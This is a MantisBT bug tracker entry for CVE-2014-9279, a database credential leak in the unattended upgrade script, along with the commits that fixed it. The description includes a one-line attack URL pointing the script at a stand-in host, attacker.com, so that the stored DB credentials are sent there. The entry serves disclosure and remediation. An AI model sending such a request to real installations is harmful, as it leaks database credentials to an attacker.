View Issue Details

WikiRelated ChangesetsJump to Notes
IDProjectCategoryView StatusDate SubmittedLast Update
0017877mantisbtsecuritypublic2014-11-14 19:342014-12-05 18:33
Reporteravlidienbrunn Assigned Todregad  
PriorityhighSeveritymajorReproducibilityalways
Status closedResolutionfixed 
Product Version1.1.0a3 
Target Version1.2.18Fixed in Version1.2.18 
Summary0017877: CVE-2014-9279: Db Credentials leak via unattended upgrade script
Description

When [MantisBT]/admin/upgrade_unattended.php?hostname=attacker.com is accessed, MantisBT will connect to attacker.com with the current DB config credentials.

Additional Information

Originally reported under point 6. in 0017362

TagsNo tags attached.

Relationships

child of 0017362 closeddregad Multiple vulnerabilities in MantisBT 

Activities

dregad

dregad

2014-11-29 12:17

developer   ~0041944

CVE request sent http://thread.gmane.org/gmane.comp.security.oss.general/14952

Related Changesets

MantisBT: master 7c7c2ac7

2014-10-30 14:53

Paul Richards

Committer: dregad


Details Diff		 DB Credentials leak in upgrade_unattended.php

Retrieve credentials from Mantis system configuration instead of
accepting them from POST parameters.

This issue was reported by Matthias Karlsson (http://mathiaskarlsson.me)
as part of Offensive Security's bug bounty program [1].

Fixes 0017877

[1] http://www.offensive-security.com/bug-bounty-program/

Signed-off-by: Damien Regad <dregad@mantisbt.org>		 Affected Issues
0017877
mod - admin/upgrade_unattended.php Diff File

MantisBT: master-1.2.x 0826cef8

2014-11-28 06:50

dregad


Details Diff		 DB Credentials leak in upgrade_unattended.php

Retrieve credentials from Mantis system configuration instead of
accepting them from POST parameters.

This issue was reported by Matthias Karlsson (http://mathiaskarlsson.me)
as part of Offensive Security's bug bounty program [1].

Paul Richards' original patch was modified to align the code with master
branch to (basically replacing DIRECTORY_SEPARATOR by '/') to facilitate
porting.

Fixes 0017877

[1] http://www.offensive-security.com/bug-bounty-program/

Signed-off-by: Damien Regad <dregad@mantisbt.org>		 Affected Issues
0017877
mod - admin/upgrade_unattended.php Diff File